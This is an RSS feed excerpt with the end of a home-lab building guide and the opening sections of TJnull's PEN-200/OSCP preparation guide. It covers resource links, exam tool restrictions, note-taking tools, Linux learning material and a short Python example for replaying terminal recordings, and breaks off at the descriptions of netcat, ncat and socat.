&lt;p&gt;Windows Active Directory: &lt;a href=&quot;https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview&quot;&gt;https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Building a Domain Lab: &lt;a href=&quot;https://social.technet.microsoft.com/wiki/contents/articles/36438.windows-server-2016-build-a-windows-domain-lab-at-home-for-free.aspx#Download&quot;&gt;https://social.technet.microsoft.com/wiki/contents/articles/36438.windows-server-2016-build-a-windows-domain-lab-at-home-for-free.aspx#Download&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Building an Effective Active Directory Environment: &lt;a href=&quot;https://adsecurity.org/?p=2653&quot;&gt;https://adsecurity.org/?p=2653&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Building an Active Directory Lab by SethSec: &lt;a href=&quot;https://sethsec.blogspot.com/2017/06/pentest-home-lab-0x2-building-your-ad.html&quot;&gt;https://sethsec.blogspot.com/2017/06/pentest-home-lab-0x2-building-your-ad.html&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Practices for Securing Active Directory: &lt;a href=&quot;https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/best-practices-for-securing-active-directory&quot;&gt;https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/best-practices-for-securing-active-directory&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Tool/Scripts to automate the deployment of your Windows Lab:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;WSLab: &lt;a href=&quot;https://github.com/microsoft/WSLab&quot;&gt;https://github.com/microsoft/WSLab&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;AutomatedLab: &lt;a href=&quot;https://github.com/AutomatedLab/AutomatedLab&quot;&gt;https://github.com/AutomatedLab/AutomatedLab&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Invoke-UserSimulator: &lt;a href=&quot;https://github.com/ubeeri/Invoke-UserSimulator&quot;&gt;https://github.com/ubeeri/Invoke-UserSimulator&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;ADImporter: &lt;a href=&quot;https://github.com/curi0usJack/ADImporter&quot;&gt;https://github.com/curi0usJack/ADImporter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Linux:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Tools:&lt;/p&gt;

&lt;p&gt;Centrify (Active Directory Integration): &lt;a href=&quot;https://www.centrify.com/pam/authentication-service/active-directory-bridging/integration/&quot;&gt;https://www.centrify.com/pam/authentication-service/active-directory-bridging/integration/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This tool lets you integrate your Linux systems into Active Directory so they can easily join the domain. It also provides single sign-on (SSO).&lt;/p&gt;

&lt;p&gt;Other Tools/Scripts for Lab Automation:&lt;/p&gt;

&lt;p&gt;These tools can be used to automate some of the manual work you will have to do in your home lab. Depending on which tool you use, it will take some time to understand how they work, but it can save hours of rebuilding systems from scratch.&lt;/p&gt;

&lt;p&gt;Terraform: &lt;a href=&quot;https://www.terraform.io/&quot;&gt;https://www.terraform.io/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Ansible: &lt;a href=&quot;https://www.ansible.com/resources/get-started&quot;&gt;https://www.ansible.com/resources/get-started&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Puppet: &lt;a href=&quot;https://puppet.com/&quot;&gt;https://puppet.com/&lt;/a&gt;&lt;/p&gt;

&lt;h1 id=&quot;conclusion&quot;&gt;Conclusion:&lt;/h1&gt;

&lt;p&gt;Having a home lab is a great way to build your skills and experience. It is important to be patient when you decide to build your lab and customize it the way you like it. There are a variety of ways to build a home lab, but make sure the way you build it matches your intended purpose. Most importantly, I hope the resources and tips that I have provided in this guide will give you a good baseline to get started.&lt;/p&gt;
</description>
            <pubDate>Sun, 31 Jul 2022 00:00:00 +0000</pubDate>
        </item>
        
        <item>
            <title>The Journey to Try Harder: TJnull’s Preparation Guide for PEN-200 PWK/OSCP 2.0</title>
            <link>/oscp/2021/05/06/The_Journey_to_Try_Harder-_TJnull-s_Preparation_Guide_for_PEN-200_PWK_OSCP_2.0.html</link>
            <guid isPermaLink="true">/oscp/2021/05/06/The_Journey_to_Try_Harder-_TJnull-s_Preparation_Guide_for_PEN-200_PWK_OSCP_2.0.html</guid>
            <description>&lt;h3 id=&quot;table-of-contents&quot;&gt;Table of Contents:&lt;/h3&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;#overview&quot;&gt;Overview&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#dedication&quot;&gt;Dedication&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#a-word-of-warning&quot;&gt;A Word of Warning!&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-1-general-course-information&quot;&gt;Section 1: General Course Information&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-2-getting-comfortable-with-kali-linux&quot;&gt;Section 2: Getting Comfortable with Kali Linux&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-3-linux-command-line-kung-fu&quot;&gt;Section 3: Linux Command Line Kung-Fu&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-4-essential-tools-in-kali&quot;&gt;Section 4: Essential Tools in Kali&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-5-getting-started-with-bash-scripting&quot;&gt;Section 5: Getting Started with Bash Scripting&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-6-passive-reconnaissance&quot;&gt;Section 6: Passive Reconnaissance&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-7-active-reconnaissance&quot;&gt;Section 7: Active Reconnaissance&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-8-vulnerability-scanning&quot;&gt;Section 8: Vulnerability Scanning&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-9-web-application-attacks&quot;&gt;Section 9: Web Application Attacks&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-10-buffer-overflows-for-windows-and-linux&quot;&gt;Section 10: Buffer Overflows for Windows and Linux&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-11-client-side-attacks&quot;&gt;Section 11: Client-Side Attacks&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-12-handling-public-exploits&quot;&gt;Section 12: Working with Public Exploits&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-13-transferring-files-to-your-target&quot;&gt;Section 13: Transferring Files to your target&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-14-antivirus-bypassing&quot;&gt;Section 14: Antivirus Bypassing&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-15-privilege-escalation&quot;&gt;Section 15: Privilege Escalation&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-16-password-cracking&quot;&gt;Section 16: Password Cracking&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-17-port-redirection-and-pivoting&quot;&gt;Section 17: Port Redirection and Pivoting&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-18-active-directory-attacks&quot;&gt;Section 18: Active Directory Attacks&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-19-metasploit-framework&quot;&gt;Section 19: Metasploit Framework&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-20-powershell-empire&quot;&gt;Section 20: PowerShell Empire&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#extra-resources&quot;&gt;Extra Resources&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#setting-up-your-pentesting-environment&quot;&gt;Setting up your Pentesting Environment&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#wargameshands-on-challenges&quot;&gt;Wargames/Hands-on Challenges&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#capture-the-flag-competitions-ctfscyber-competitions&quot;&gt;Capture the Flag Competitions (CTFs)/Cyber Competitions&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#bug-bounty-programs&quot;&gt;Bug Bounty Programs&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#vulnerable-machines&quot;&gt;Vulnerable Machines&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#tips-to-participate-in-the-proctored-oscp-exam&quot;&gt;Tips to participate in the Proctored OSCP exam&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#other-resources&quot;&gt;Other Resources&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#conclusion&quot;&gt;Conclusion&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;overview&quot;&gt;Overview:&lt;/h1&gt;
&lt;p&gt;After releasing the first version of my PWK/OSCP guide, Offsec released an update to the PWK/OSCP and included a classification system to help students understand how course designations work. The PWK/OSCP is classified as PEN-200, and after spending some time reviewing the course I decided that I wanted to create an updated version of this guide to help future students prepare for the new PEN-200. 
For those of you that have read my previous version, you will notice that some sections still have the same resources, but you will also notice new resources in each section. I have taken the time to make sure that the information and my advice will help you prepare for your adventure to take the PEN-200 PWK/OSCP!&lt;/p&gt;

&lt;p&gt;For those of you that would like to know about my journey when I took the course and exam, you can find my earlier post here: 
&lt;a href=&quot;https://www.netsecfocus.com/oscp/review/2019/01/29/An_Adventure_to_Try_Harder_Tjnulls_OSCP_Journey.html&quot;&gt;https://www.netsecfocus.com/oscp/review/2019/01/29/An_Adventure_to_Try_Harder_Tjnulls_OSCP_Journey.html&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If you are still going through the old labs and course material, you can find the first guide here:
&lt;a href=&quot;https://www.netsecfocus.com/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html&quot;&gt;https://www.netsecfocus.com/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html&lt;/a&gt;&lt;/p&gt;

&lt;h1 id=&quot;dedication&quot;&gt;Dedication:&lt;/h1&gt;
&lt;p&gt;As always, a big shout out goes to abatchy! Without his guide I would have never started exploring for other resources. Thank you for creating your original guide: 
&lt;a href=&quot;https://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob&quot;&gt;https://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I also want to thank the following people for taking the time to read and provide feedback for the updated version of this guide:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://twitter.com/reybango&quot;&gt;Rey Bango&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://twitter.com/TunnyTraffic&quot;&gt;VCSEC, a moderator at Netsec Focus&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://twitter.com/g0tmi1k&quot;&gt;G0t Mi1k&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Andy &lt;a href=&quot;https://twitter.com/ZephrFish?s=20&quot;&gt;ZephrFish&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Joe &lt;a href=&quot;https://twitter.com/TheBlindHacker&quot;&gt;TheBlindHacker&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;The team at &lt;a href=&quot;https://twitter.com/offsectraining&quot;&gt;Offensive Security&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This guide has been approved by Offensive Security for PEN-200!&lt;/p&gt;

&lt;h1 id=&quot;a-word-of-warning&quot;&gt;A Word of Warning!&lt;/h1&gt;
&lt;p&gt;Do not expect these resources to be the main thing you use for obtaining OSCP. When you are ready to take the course, you should expect the following:&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;Spending a lot of time researching.&lt;/li&gt;
  &lt;li&gt;Do not expect the student admins or even other students to give you answers easily; put in the effort to research your questions.&lt;/li&gt;
  &lt;li&gt;Plan to make a commitment to this and have an open mindset to learning new things.&lt;/li&gt;
  &lt;li&gt;Everyone prepares differently, mentally and otherwise. Learn to build your own strategy/methodology that works for you when you are improving your practical skills.&lt;/li&gt;
  &lt;li&gt;Know your tools! There are certain tools that you cannot use for the exam. However, that does not mean you should skip over them. Take some time to understand them because you may have to use them on an actual engagement or in the field.&lt;/li&gt;
  &lt;li&gt;Be careful when using automated tools: automated tools can improve your performance and reduce the time your methodology takes when assessing a target. However, these tools often rely on particular features, or on scripts that chain together common tools to automate their findings, and they can miss services or findings that you should be looking for. It is best to take the time to understand how things work manually.&lt;/li&gt;
  &lt;li&gt;Remember Offensive Security’s motto: TRY HARDER &lt;a href=&quot;https://www.offensive-security.com/offsec/what-it-means-to-try-harder/&quot;&gt;https://www.offensive-security.com/offsec/what-it-means-to-try-harder/&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;As of now, Offensive Security has restricted the following tools:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Commercial tools or services (Metasploit Pro, Burp Pro, etc.)&lt;/li&gt;
  &lt;li&gt;Automatic exploitation tools (e.g. db_autopwn, browser_autopwn, SQLmap, SQLninja, etc.)&lt;/li&gt;
  &lt;li&gt;Mass vulnerability scanners (e.g. Nessus, NeXpose, OpenVAS, Canvas, Core Impact, SAINT, etc.)&lt;/li&gt;
  &lt;li&gt;Features in other tools that fall under the forbidden or restricted exam limitations above&lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Any tools that perform similar functions as those above are also prohibited. You are ultimately responsible for knowing what features or external utilities any chosen tool is using. The primary objective of the OSCP exam is to evaluate your skills in identifying and exploiting vulnerabilities, not in automating the process.&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;Use Case for Understanding the Tools/Scripts you use in a Pentest: &lt;a href=&quot;https://www.offensive-security.com/offsec/understanding-pentest-tools-scripts/&quot;&gt;https://www.offensive-security.com/offsec/understanding-pentest-tools-scripts/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Reference: &lt;a href=&quot;https://support.offensive-security.com/oscp-exam-guide/&quot;&gt;https://support.offensive-security.com/oscp-exam-guide/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Most importantly: Have fun! You will learn a lot from this course, so take your time to understand the material and this guide. 
Do not forget to take breaks and spend time away from the electronics. Trust me, you do not want to burn yourself out.&lt;/p&gt;

&lt;h2 id=&quot;course-syllabus&quot;&gt;Course Syllabus&lt;/h2&gt;

&lt;p&gt;The second most important resource that I used to help me prepare for the course:
&lt;a href=&quot;https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf&quot;&gt;https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I will break down each section of the syllabus by providing the resources I used to prepare for the course. Once I finish going through the syllabus, I will also provide some extra resources that came in handy. You don’t need to use this guide in order; feel free to jump around as it suits you.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;General Course Information&lt;/li&gt;
  &lt;li&gt;Getting Comfortable with Kali Linux&lt;/li&gt;
  &lt;li&gt;Linux Command Line Kung-Fu&lt;/li&gt;
  &lt;li&gt;Essential Tools in Kali&lt;/li&gt;
  &lt;li&gt;Getting Started with Bash Scripting&lt;/li&gt;
  &lt;li&gt;Passive Reconnaissance&lt;/li&gt;
  &lt;li&gt;Active Reconnaissance&lt;/li&gt;
  &lt;li&gt;Vulnerability Scanning&lt;/li&gt;
  &lt;li&gt;Web Application Attacks&lt;/li&gt;
  &lt;li&gt;Windows/Linux Buffer Overflows&lt;/li&gt;
  &lt;li&gt;Client-Side Attacks&lt;/li&gt;
  &lt;li&gt;Working with Public Exploits&lt;/li&gt;
  &lt;li&gt;File Transfer&lt;/li&gt;
  &lt;li&gt;Antivirus Bypassing&lt;/li&gt;
  &lt;li&gt;Privilege Escalation&lt;/li&gt;
  &lt;li&gt;Password Attacks&lt;/li&gt;
  &lt;li&gt;Tunnelling/Pivoting&lt;/li&gt;
  &lt;li&gt;Active Directory Attacks&lt;/li&gt;
  &lt;li&gt;Introduction to the Metasploit Framework&lt;/li&gt;
  &lt;li&gt;PowerShell Empire&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;section-1-general-course-information&quot;&gt;Section 1: General Course Information&lt;/h1&gt;

&lt;p&gt;This section provides an overview of what you should expect on the course. The PDF guide you will receive with your course materials contains a list of resources and explains how you should approach the material and the lab environment. I highly recommend that you read the restrictions carefully, along with OffSec’s view of how a report should be created. 
Those sections are really going to help you understand how you should be taking your notes, how to write your report, what to expect when you are testing the lab environment, and also what you should be careful of doing when you are going through the course.&lt;/p&gt;

&lt;p&gt;When it comes to report writing and note taking you should be documenting EVERYTHING that you identify. This includes output from scans, screenshots from key findings, your assumptions, and much more. Organizing these notes will pay off in the long term when it comes to writing the report. Remember you can always choose to not include information in the report if you don’t need it. But re-tracing your steps to grab screenshots, tool output, etc. will take valuable time.&lt;/p&gt;

&lt;p&gt;Keep in mind that everyone takes notes and builds their reports differently. It is up to you to build your format and layout when you are creating these notes that fits your workflow. You’ll develop and hone this as you go through the exercises and labs. This is a very important lesson.&lt;/p&gt;

&lt;p&gt;Here are some resources that can give you an idea of note taking tools, what templates people use for note taking, and how corporations create their pentest reports:&lt;/p&gt;

&lt;p&gt;Reporting Tools:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Joplin: &lt;a href=&quot;https://github.com/laurent22/joplin&quot;&gt;https://github.com/laurent22/joplin&lt;/a&gt; In Kali: apt install joplin&lt;/li&gt;
  &lt;li&gt;CherryTree: &lt;a href=&quot;https://github.com/giuspen/cherrytree&quot;&gt;https://github.com/giuspen/cherrytree&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Typora: &lt;a href=&quot;https://typora.io/&quot;&gt;https://typora.io/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;OneNote &lt;a href=&quot;https://www.microsoft.com/en-us/microsoft-365/onenote/digital-note-taking-app&quot;&gt;https://www.microsoft.com/en-us/microsoft-365/onenote/digital-note-taking-app&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Obsidian &lt;a href=&quot;https://obsidian.md/&quot;&gt;https://obsidian.md/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Note/Reporting Pentest Templates:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;TJ Joplin Pentest Template: &lt;a href=&quot;https://github.com/tjnull/TJ-JPT&quot;&gt;https://github.com/tjnull/TJ-JPT&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Maik’s Pentest Template in OneNote: &lt;a href=&quot;https://maikthulhu.github.io/2017-11-20-onenote-layout/&quot;&gt;https://maikthulhu.github.io/2017-11-20-onenote-layout&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;James Hall Cherry Tree Template: &lt;a href=&quot;https://411hall.github.io/assets/files/CTF_template.ctb&quot;&gt;https://411hall.github.io/assets/files/CTF_template.ctb&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Whoisflynn OSCP Report Template: &lt;a href=&quot;https://github.com/whoisflynn/OSCP-Exam-Report-Template&quot;&gt;https://github.com/whoisflynn/OSCP-Exam-Report-Template&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Pentest Reports:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Julio’s repo of public pentest reports: &lt;a href=&quot;https://github.com/juliocesarfort/public-pentesting-reports&quot;&gt;https://github.com/juliocesarfort/public-pentesting-reports&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Screenshot Tools:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Kazam (In Kali): &lt;a href=&quot;https://launchpad.net/kazam&quot;&gt;https://launchpad.net/kazam&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Shutter: &lt;a href=&quot;https://shutter-project.org/&quot;&gt;https://shutter-project.org/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Flameshot &lt;a href=&quot;https://github.com/flameshot-org/flameshot&quot;&gt;https://github.com/flameshot-org/flameshot&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Tools to record your terminal input/output:&lt;/p&gt;

&lt;p&gt;Script: The script command records a shell session so that you can later review exactly the output you saw at the time; it can also record timing information so that you can replay the session in real time.&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://man7.org/linux/man-pages/man1/script.1.html&quot;&gt;https://man7.org/linux/man-pages/man1/script.1.html&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Using Script to record everything in your terminal: &lt;a href=&quot;https://ostechnix.com/record-everything-terminal/&quot;&gt;https://ostechnix.com/record-everything-terminal/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
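
&lt;p&gt;As an added example (not part of the original guide), the following Python models what scriptreplay does with the two-column timing log that script -t writes (seconds since the previous chunk, then a byte count), so a recorded session can be reviewed offline at its original pace or faster. The session contents are constructed, and the handling of the typescript header line is my assumption about the classic format.&lt;/p&gt;

```python
"""Replay a `script` recording from its timing log (added example)."""
import sys
import time

# Constructed sample session, not a real recording. The typescript's first
# line is the "Script started on" header, which scriptreplay skips and which
# the timing log does not count (assumption about the classic format).
SAMPLE_TYPESCRIPT = (
    b"Script started on 2024-01-01 10:00:00+00:00\n"
    b"$ id\r\n"                                       # 6 bytes
    b"uid=1000(student) gid=1000(student)\r\n"         # 37 bytes
    b"$ exit\r\n"                                     # 8 bytes
)
# Classic two-column timing log: seconds since the previous chunk, byte count.
SAMPLE_TIMING = "0.500000 6\n2.250000 37\n4.000000 8\n"


def parse_timing(timing_text):
    """Return [(delay_seconds, byte_count), ...] from a classic timing log."""
    entries = []
    for line in timing_text.splitlines():
        if line.strip():
            delay, count = line.split()
            entries.append((float(delay), int(count)))
    return entries


def replay_events(timing_text, typescript, divisor=1.0, maxdelay=None):
    """Schedule the session as [(seconds_since_start, chunk), ...].

    divisor speeds playback up (like scriptreplay --divisor); maxdelay caps
    any single pause (like scriptreplay --maxdelay), so idle minutes in a
    recording do not stall a review.
    """
    body = typescript.split(b"\n", 1)[1]   # drop the header line
    events, clock, pos = [], 0.0, 0
    for delay, count in parse_timing(timing_text):
        delay /= divisor
        if maxdelay is not None:
            delay = min(delay, maxdelay)
        clock += delay
        chunk = body[pos:pos + count]
        if len(chunk) != count:
            raise ValueError("typescript is shorter than the timing log describes")
        pos += count
        events.append((round(clock, 6), chunk))
    return events


def rendered_output(timing_text, typescript):
    """The session exactly as it scrolled past, header line excluded."""
    return b"".join(chunk for _, chunk in replay_events(timing_text, typescript)).decode()


def replay(timing_text, typescript, divisor=1.0, maxdelay=None):
    """Play the session back on stdout with its original (or scaled) pacing."""
    start = time.monotonic()
    for at, chunk in replay_events(timing_text, typescript, divisor, maxdelay):
        time.sleep(max(0.0, at - (time.monotonic() - start)))
        sys.stdout.write(chunk.decode(errors="replace"))
        sys.stdout.flush()


if __name__ == "__main__":
    # Twice normal speed, never pausing longer than a second.
    replay(SAMPLE_TIMING, SAMPLE_TYPESCRIPT, divisor=2.0, maxdelay=1.0)
```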

&lt;h1 id=&quot;section-2-getting-comfortable-with-kali-linux&quot;&gt;Section 2: Getting Comfortable with Kali Linux&lt;/h1&gt;

&lt;p&gt;Kali Linux Revealed and Online Course: 
A good foundational course that helped me understand more about Kali Linux; it also has a nice Linux Fundamentals section.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Book Link: &lt;a href=&quot;https://kali.training/downloads/Kali-Linux-Revealed-1st-edition.pdf&quot;&gt;https://kali.training/downloads/Kali-Linux-Revealed-1st-edition.pdf&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Online Course Link: &lt;a href=&quot;https://kali.training/lessons/introduction/&quot;&gt;https://kali.training/lessons/introduction/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Kali Linux Documentation: &lt;a href=&quot;https://www.kali.org/docs/&quot;&gt;https://www.kali.org/docs/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Issues or feature requests that you think should be added to Kali:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Bug Tracker: &lt;a href=&quot;https://bugs.kali.org/my_view_page.php&quot;&gt;https://bugs.kali.org/my_view_page.php&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;For troubleshooting and support issues:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Kali Linux Support Forum: &lt;a href=&quot;https://forums.kali.org/&quot;&gt;https://forums.kali.org/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Other Resources for Kali Linux:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Building your own Kali ISO: &lt;a href=&quot;https://www.kali.org/docs/development/dojo-mastering-live-build/&quot;&gt;https://www.kali.org/docs/development/dojo-mastering-live-build/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Use Case: &lt;a href=&quot;https://www.offensive-security.com/kali-linux/creating-kali-i3-gaps/&quot;&gt;https://www.offensive-security.com/kali-linux/creating-kali-i3-gaps/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;section-3-linux-command-line-kung-fu&quot;&gt;Section 3: Linux Command Line Kung-Fu&lt;/h1&gt;

&lt;p&gt;Linux Journey: 
A huge guide to learn about a variety of different things in Linux. All the lessons are free.&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://linuxjourney.com/&quot;&gt;https://linuxjourney.com/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;EDX Introduction to Linux:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.edx.org/course/introduction-to-linux&quot;&gt;https://www.edx.org/course/introduction-to-linux&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Explainshell: 
An awesome resource that parses a variety of man pages from the Ubuntu Manpage Repository. It breaks down the commands you are using, but it is best to refer to the man pages if you have any questions.&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.explainshell.com/&quot;&gt;https://www.explainshell.com/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/posts/TJNulls_Preparation_Guide_for_PEN_200/explainshell.png&quot; alt=&quot;alt-text&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Hands-on challenges to get comfortable with Linux:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Overthewire Bandit: &lt;a href=&quot;https://overthewire.org/wargames/bandit/&quot;&gt;https://overthewire.org/wargames/bandit/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Cmdchallenge.com: &lt;a href=&quot;https://cmdchallenge.com/&quot;&gt;https://cmdchallenge.com/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;HackerRank Linux Shell: &lt;a href=&quot;https://www.hackerrank.com/domains/shell&quot;&gt;https://www.hackerrank.com/domains/shell&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Books:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;The Linux Command Line (2nd Edition): &lt;a href=&quot;https://nostarch.com/tlcl2&quot;&gt;https://nostarch.com/tlcl2&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Linux for Hackers: &lt;a href=&quot;https://nostarch.com/linuxbasicsforhackers&quot;&gt;https://nostarch.com/linuxbasicsforhackers&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Linux Command (Learning the Shell): &lt;a href=&quot;http://linuxcommand.org/lc3_learning_the_shell.php&quot;&gt;http://linuxcommand.org/lc3_learning_the_shell.php&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;section-4-essential-tools-in-kali&quot;&gt;Section 4: Essential Tools in Kali&lt;/h1&gt;
&lt;p&gt;Netcat: The TCP/IP Swiss Army tool. Experiment with this tool and understand what it does because you will be using this almost every day during your course and beyond.&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;SANS Netcat Cheatsheet: &lt;a href=&quot;https://www.sans.org/posters/netcat-cheat-sheet/&quot;&gt;https://www.sans.org/posters/netcat-cheat-sheet/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Netcat Cheatsheet Reference: &lt;a href=&quot;https://quickref.me/nc&quot;&gt;https://quickref.me/nc&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Ncat: A better version of netcat in my opinion. Supports SSL communication and it is part of Nmap.&lt;/p&gt;

&lt;p&gt;Socat: A command-line utility that establishes two bidirectional byte streams and transfers data between them. Unlike netcat, it can serve multiple clients on a single listening port and reuse connections.&lt;/p&gt;

